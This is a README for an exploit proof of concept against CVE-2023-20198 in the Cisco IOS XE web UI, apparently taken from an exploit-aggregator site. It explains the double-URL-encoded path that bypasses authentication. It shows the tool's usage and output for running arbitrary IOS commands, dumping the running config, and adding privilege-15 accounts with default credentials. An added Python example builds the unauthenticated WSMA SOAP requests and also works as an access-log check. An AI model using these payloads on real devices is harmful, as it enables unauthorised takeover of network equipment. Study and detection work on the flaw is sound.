## https://sploitus.com/exploit?id=943D5962-14B3-5410-8106-BD5EEA778153
# CVE-2023-20198
Exploit PoC for CVE-2023-20198

## Description
CVE-2023-20198 is an improper path validation flaw in the IOS XE web UI: the front-end Nginx filtering can be bypassed by double URL-encoding the request path (the `/%2577eb%2575i_%2577sma_Http` path in the examples below only decodes to `webui_wsma_http` after a second decode), which reaches the internal `webui_wsma_http` endpoint without authentication.<br>
Once that endpoint is reachable, an attacker can execute arbitrary Cisco IOS commands or push configuration changes at privilege level 15.<br>
Cisco's investigation into in-the-wild exploitation of the then-undisclosed vulnerability found that threat actors first used CVE-2023-20198 to add a new privilege level 15 user, then exploited CVE-2023-20273 to escalate to the underlying Linux `root` user and install an implant.<br>

This PoC uses CVE-2023-20198 to reach two different WSMA XML SOAP services:<br>
The vulnerability check (`-c`), running-config (`-g`) and command execution (`-e`) options all target the `cisco:wsma-exec` SOAP endpoint and place the command in the `execCLI` element.<br>
The add-user option (`-a`) targets the `cisco:wsma-config` SOAP endpoint to push a configuration change that creates the privilege 15 account. That endpoint could be (ab)used for any other configuration change, but that's outside the scope of this PoC.<br>

The `cisco:wsma-exec` request format comes from the nuclei template.<br>
The `cisco:wsma-config` request format comes from the horizon3ai PoC.<br>

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

## Usage
```
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity
```

### Vulnerability check
To check for CVE-2023-20198, `-c` attempts to exploit the vulnerability to execute `uname -a`; a device that returns command output is reported as vulnerable together with its version string.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```

### Get Cisco Config
The `-g` option executes `sh run` to pull the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...
```

### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Use extreme caution when using this to make configuration changes: the tool performs no input validation, and changes are applied immediately to the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...
```

### Add user
The `-a` option creates a new privilege 15 user account; the account name and password can be set with `-u` and `-p` respectively (defaults: `shellsmoke` / `pwned`).<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.
```

### Del user
The `-d` option removes a user account from the device, using the username given with `-u` (default: `shellsmoke`).<br>
Take care not to delete a legitimate account.<br>
This was added for cases where shell or web UI access to an exploited device cannot be obtained afterwards: adding a privilege 15 user was observed not to grant web UI access, so without `-d` the account created by `-a` would be left behind on the host as an exploitation artifact.<br>
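As an added example, not part of this repository or of `exploit.py`, the following Python builds the two request types the Description section describes (a `cisco:wsma-exec` envelope for `-c`/`-g`/`-e`, a `cisco:wsma-config` envelope for `-a`/`-d`), shows how the double-encoded path decodes past a single-decode filter, and parses a wsma-exec response. Assumptions: element names under the two namespaces follow Cisco's WSMA documentation rather than exploit.py's source; the `username ... privilege 15 secret ...` config line is this example's choice; the sample response is constructed, not captured from a device; and nothing is sent over the network.

```python
"""Added example: WSMA request construction and response parsing for the
CVE-2023-20198 request shapes described in this README. Not exploit.py's code.
Assumptions: element names per Cisco's WSMA docs; sample response is constructed."""
from urllib.parse import unquote
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
EXEC_NS = "urn:cisco:wsma-exec"
CONFIG_NS = "urn:cisco:wsma-config"
TARGET_ENDPOINT = "webui_wsma_http"             # internal endpoint Nginx is meant to gate
ENCODED_PATH = "/%2577eb%2575i_%2577sma_Http"   # path shown in the README's sample output


def decode_stages(path):
    """Return (path after one percent-decode, path after two).
    A filter that decodes once sees the first form; a backend that decodes
    again routes on the second, which is why the double encoding slips through."""
    once = unquote(path)
    return once, unquote(once)


def is_double_encoding_bypass(path):
    """True when the endpoint name only appears after a second decode.
    Works both for shaping the request and as a check over access-log paths."""
    once, twice = decode_stages(path)
    return TARGET_ENDPOINT not in once.lower() and TARGET_ENDPOINT in twice.lower()


def _envelope(body):
    # No wsse UsernameToken header: the path bypass is what stands in for auth here.
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<SOAP:Envelope xmlns:SOAP="{SOAP_NS}"><SOAP:Body>{body}'
            '</SOAP:Body></SOAP:Envelope>')


def exec_request(command, correlator="1"):
    """wsma-exec envelope with one execCLI/cmd pair (the -c, -g and -e shape).
    escape() keeps a command containing '<' or '&' from breaking the XML."""
    body = (f'<request xmlns="{EXEC_NS}" correlator="{escape(correlator)}">'
            f'<execCLI maxWait="PT100S" xsd="false"><cmd>{escape(command)}</cmd>'
            '</execCLI></request>')
    return _envelope(body)


def config_request(config_lines, correlator="1"):
    """wsma-config envelope: configApply with one cmd element per config line.
    Assumption: configApply/config-data/cli-config-data nesting per Cisco WSMA docs."""
    cmds = "".join(f"<cmd>{escape(line)}</cmd>" for line in config_lines)
    body = (f'<request xmlns="{CONFIG_NS}" correlator="{escape(correlator)}">'
            f'<configApply details="all"><config-data><cli-config-data>{cmds}'
            '</cli-config-data></config-data></configApply></request>')
    return _envelope(body)


def add_user_request(username, password):
    # 'secret' (hashed) rather than 'password' is this example's choice, not exploit.py's.
    return config_request([f"username {username} privilege 15 secret {password}"])


def remove_user_request(username):
    # Mirror of the -d option: drop the account added by -a from the running config.
    return config_request([f"no username {username}"])


def parse_exec_response(xml_text):
    """Extract the success flag and (cmd, output) pairs from a wsma-exec response.
    Assumption: response/execLog/dialogueLog/{cmd,text} layout per Cisco WSMA docs."""
    root = ET.fromstring(xml_text)
    resp = root.find(f".//{{{EXEC_NS}}}response")
    if resp is None:                       # not a WSMA reply (e.g. the 404/login page)
        return {"success": False, "outputs": []}
    outputs = []
    for log in resp.iterfind(f".//{{{EXEC_NS}}}dialogueLog"):
        cmd = log.findtext(f"{{{EXEC_NS}}}cmd", default="")
        text = log.findtext(f"{{{EXEC_NS}}}text", default="")
        outputs.append((cmd.strip(), text.strip()))
    return {"success": resp.get("success") == "1", "outputs": outputs}


# Constructed sample response (not captured from a device), shaped per the WSMA docs.
SAMPLE_RESPONSE = f"""<?xml version="1.0" encoding="UTF-8"?>
<SOAP:Envelope xmlns:SOAP="{SOAP_NS}"><SOAP:Body>
<response xmlns="{EXEC_NS}" correlator="1" success="1">
<execLog><dialogueLog><cmd>show version</cmd>
<text>Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)</text>
</dialogueLog></execLog></response>
</SOAP:Body></SOAP:Envelope>"""


if __name__ == "__main__":
    print("bypass-shaped path:", is_double_encoding_bypass(ENCODED_PATH))
    print(exec_request("show version"))
    print(add_user_request("shellsmoke", "pwned"))
    print(parse_exec_response(SAMPLE_RESPONSE))
```

The envelope would be POSTed to the encoded path shown in the examples above; `is_double_encoding_bypass` is also a usable filter over web server access-log paths when hunting for exploitation attempts, since it flags any request whose path only resolves to `webui_wsma_http` after a second decode, whatever letters were encoded.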

## References
[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>
[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>
[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>
[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>

## TODO
- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling

## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil